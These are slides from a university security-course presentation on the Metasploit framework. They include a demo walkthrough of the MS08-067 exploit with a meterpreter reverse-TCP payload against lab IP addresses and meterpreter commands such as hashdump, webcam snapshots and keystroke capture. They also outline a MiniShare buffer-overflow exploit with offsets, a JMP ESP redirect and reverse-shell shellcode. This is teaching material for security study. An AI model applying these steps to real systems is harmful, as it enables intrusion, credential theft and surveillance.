Metasploit - University of Massachusetts Lowell

burnwholeInternet και Εφαρμογές Web

5 Φεβ 2013 (πριν από 4 χρόνια και 8 μήνες)

213 εμφανίσεις

91.661 Project
-

1


5/4/2011

The University of Massachusetts Lowell

Anthony Gabrielson

Adam
Helbling

The University of Massachusetts Lowell

91.661 Project
-

2


5/4/2011

Agenda


Part 2:
From ‘
ploit
’ to ‘
ploit



Overview


Assumptions


Environment Setup


Ollydbg

Introduction


Vulnerability Explanation


Crafting the Exploit


Metasploit

Enablers


Adding
Shellcode


Part 1:
The
Metasploit

Framework


Basics


Running
Metasploit


The Exploit


Demo


More on Exploits

The University of Massachusetts Lowell

91.661 Project
-

3


5/4/2011

The
Metasploit

Framework
:

Basics


Created in 2003 by HD Moore



Vitals


BSD License


700K lines of Ruby



Currently produced by Rapid 7



De facto standard in vulnerability development framework


Commercial Alternatives


Rapid 7 has many commercial implementations


Immunities CANVAS


Core Impact

The University of Massachusetts Lowell

91.661 Project
-

4


5/4/2011

The
Metasploit

Framework
:

Basics
(cont’d)


Metasploit is a well known anti
-
forensic and evasion tool


Modular for ease of development and portability



msfupdate


Get the latest & greatest exploits


msfconsole


The console


also works as a command shell



Exploit Automation


Db_autopwn


Very noisy


Requires a database


The University of Massachusetts Lowell

91.661 Project
-

5


5/4/2011

The
Metasploit

Framework
:

Running
Metasploit

The University of Massachusetts Lowell

91.661 Project
-

6


5/4/2011

The
Metasploit

Framework
:

The Exploit


ms08_067_netapi (RANK: Great)


This module
exploits a parsing flaw
in the path
canonicalization code of NetAPI32.dll through the
Server Service
. This module is capable of bypassing
NX on some operating systems and service packs. The
correct target must be used to prevent the Server
Service (along with a dozen others in the same
process) from crashing. Windows XP targets seem to
handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module,
full support for NX bypass on 2003, along with other
platforms, is still in development.


This attack
can be prevented
with the MS08
-
067 patch.

The University of Massachusetts Lowell

91.661 Project
-

7


5/4/2011

The
Metasploit

Framework
:

Demo

The University of Massachusetts Lowell

91.661 Project
-

8


5/4/2011

The
Metasploit

Framework
:

Demo
Walkthrough


Msfconsole


use exploit/windows/smb/ms08_067_netapi


set PAYLOAD windows/
meterpreter/reverse_tcp


set RHOST [remote host] 192.168.11.51


set LHOST [local host] 192.168.11.53


show options


Module options (exploit/windows/smb/ms08_067_netapi):





Name Current Setting Required Description



----

---------------

--------

-----------



RHOST 192.168.11.51
yes The target address



RPORT 445 yes Set the SMB service port



SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)




Payload options (windows/
meterpreter/reverse_tcp
):





Name Current Setting Required Description



----

---------------

--------

-----------



EXITFUNC thread yes Exit technique:
seh
, thread, none, process



LHOST 192.168.11.53
yes The listen address



LPORT 4444 yes The listen port


Exploit


The University of Massachusetts Lowell

91.661 Project
-

9


5/4/2011

The
Metasploit

Framework
:

More about
the Exploit


msf

exploit(ms08_067_netapi) > show targets


Exploit targets:



Id Name


--

----


0 Automatic Targeting


1 Windows 2000 Universal


2 Windows XP SP0/SP1 Universal


3 Windows XP SP2 English (NX)


4 Windows XP SP3 English (NX)



61 Windows 2003 SP2 Japanese (NO NX)

The University of Massachusetts Lowell

91.661 Project
-

10


5/4/2011

The
Metasploit

Framework
:

Meterpreter

Commands


Commands


meterpreter

>
sysinfo


System Language :
en_US


OS : Windows XP (Build 2600, Service Pack 2).


Computer : AGABRIEL
-
B90B23


Architecture : x86


Meterpreter

: x86/win32


meterpreter

>
getuid


Server username: NT AUTHORITY
\
SYSTEM


meterpreter

> shell


Process 396 created.


Channel 1 created.


Microsoft Windows XP [Version 5.1.2600]


(C) Copyright 1985
-
2001 Microsoft Corp.



C:
\
WINDOWS
\
system32>


More


Hashdump


Upload


Webcam_snap


keybscan_{start
, stop, dump}


ps

The University of Massachusetts Lowell

91.661 Project
-

11


5/4/2011


Q: What can you do with a known vulnerability?


Craft an exploit, execute from a command
-
line


What else?


Metasploit is not perfect, but it has its place.


Repository


Framework


Tools to help build exploits


Ease of use


Generic
shellcode

vs. robust
shellcode



Challenges:


Crafting the exploit


Reuse of an exploit



From
ploit

to
ploit
: Overview

…or how to add a generic exploit to your metasploit
arsenal

The University of Massachusetts Lowell

91.661 Project
-

12


5/4/2011

From
ploit

to
ploit
: Assumptions


Already spent resources (time, money, etc.) to discover a
vulnerability via one (or all) of the following:


Fuzzing


Static disassembly


Review of source code


Known vulnerability


CVE we found on (
http://cve.mitre.org/
)


Security Advisory (
http://secunia.com/advisories
)


Known Exploit


Exploit DB (
http://www.exploit
-
db.com/exploits
)



The University of Massachusetts Lowell

91.661 Project
-

13


5/4/2011

From
ploit

to
ploit
: Environment Setup


Vulnerability:
MiniShare

HTTP “GET” Request Buffer
Overflow Vulnerability


Exploit:
MiniShare

Remote Buffer Overflow Exploit (c
source)



Windows XP SP2 (or really any XP version)


MiniShare

1.4.1


Ollydbg

1.10


Backtrack 4


Metasplioit


Python


Netcat

The University of Massachusetts Lowell

91.661 Project
-

14


5/4/2011

From
ploit

to
ploit
:
Ollydbg

Introduction


Main Pane:


CPU Instructions (Microsoft Assembler format)


Memory Pane:


Current section of memory where the code is executing


Registers Pane:


EIP: Address of next instruction to be executed


ESP: Stack pointer


Stack Pane:


Shows the entries on stack


The University of Massachusetts Lowell

91.661 Project
-

15


5/4/2011

From
ploit

to
ploit
: Vulnerability
Explanation


HTTP GET with a large (>1787 bytes) request


GET [a string of >1787 bytes] HTTP/1.1
\
r
\
n
\
r
\
n


EIP = 0x41414141


Access violation when reading [41414141]


EIP points to the address containing the next
instruction, but 0x41414141 throws an access violation.


ESP = the address of the buffer that was overflowed.


Note the “AAAAAAAAAAAAAAAAAA……AAAA”


The University of Massachusetts Lowell

91.661 Project
-

16


5/4/2011

From
ploit

to
ploit
: Crafting the Exploit


This approach is different then the lab exercise assigned.


We are not overwriting stack’s return address here


Instead let’s find an instruction in the code to transfer our
execution:


\
xFF
\
xE4 = JMP ESP



Jump to the address stored in ESP.


Overwrite EIP with the address of a JMP ESP instruction.




More robust to some degree because we will pick an address that
is predictable and will work across more systems.


In Win XP SP2 there is no randomization of base location for
where DLLs are loaded, therefore if we chose a DLL it will
work on each system that loads this DLL.


However, the best choice would be a DLL provided with
MiniShare
, however, there are none, so we revert to using a
Windows DLL.

The University of Massachusetts Lowell

91.661 Project
-

17


5/4/2011

From
ploit

to
ploit
:
Metasploit

Enablers


/
pentest
/exploits/framework3/tools/
pattern_create.rb


Creates a unique pattern of a user specified length.


Useful for understanding the offsets within the
buffer where we overwrite.


/
pentest
/exploits/framework3/tools/
pattern_offset.rb


Returns the location of where EIP is overwritten and
where ESP points to.


Finds offsets using from the pattern generated by
pattern_create.rb




EIP overwritten at 1787 bytes into our buffer


ESP points to location 1791 bytes into our buffer

The University of Massachusetts Lowell

91.661 Project
-

18


5/4/2011

From
ploit

to
ploit
: Adding
Shellcode


Using
msfpayload

which comes with
Metasploit

we will
create a useful piece of
shellcode

which creates a reverse
shell on a port.


What is a reverse shell?


Note: Does this give us away?!


C style vs. raw output (‘R’ vs. ‘C’)



Does anyone see a problem with some of this
shellcode
?


Msfencode

can help us…



Let’s add some NOP’s to help improve stability.



Now all that would need to be done is to add this to
Metasploit

as a ruby script. (Note: It’s already in there)


The University of Massachusetts Lowell

91.661 Project
-

19


5/4/2011

References and Conclusions


http://grey
-
corner.blogspot.com/2010/01/beginning
-
stack
-
based
-
buffer
-
overflow.html


This presentation just begins to scratch the surface


http://www.offensive
-
security.com/metasploit
-
unleashed/Metasploitable



Questions?

The University of Massachusetts Lowell

91.661 Project
-

20


5/4/2011

The
Metasploit

Framework
:

The Exploit
(2)


psexec


light
-
weight telnet
-
replacement that lets you execute
processes on other systems


This module uses a valid administrator username and
password (or password hash) to execute an arbitrary
payload. This module is similar to the "
psexec
" utility
provided by
SysInternals
. This module is now able to
clean up after itself. The service created by this tool
uses a randomly chosen name and description.


This one has more, list ‘
em


The University of Massachusetts Lowell

91.661 Project
-

21


5/4/2011

The Exploit (3)


ms05_039_pnp


Vulnerability in Plug and Play Could Allow Remote
Code Execution and Elevation of Privilege


This module exploits a stack buffer overflow in the
Windows Plug and Play service. This vulnerability can
be exploited on Windows 2000 without a valid user
account. NOTE: Since the PnP service runs inside the
service.exe

process, a failed exploit attempt will cause
the system to automatically reboot.


Affected Systems: Win2k SP4, Win XP SP2, etc…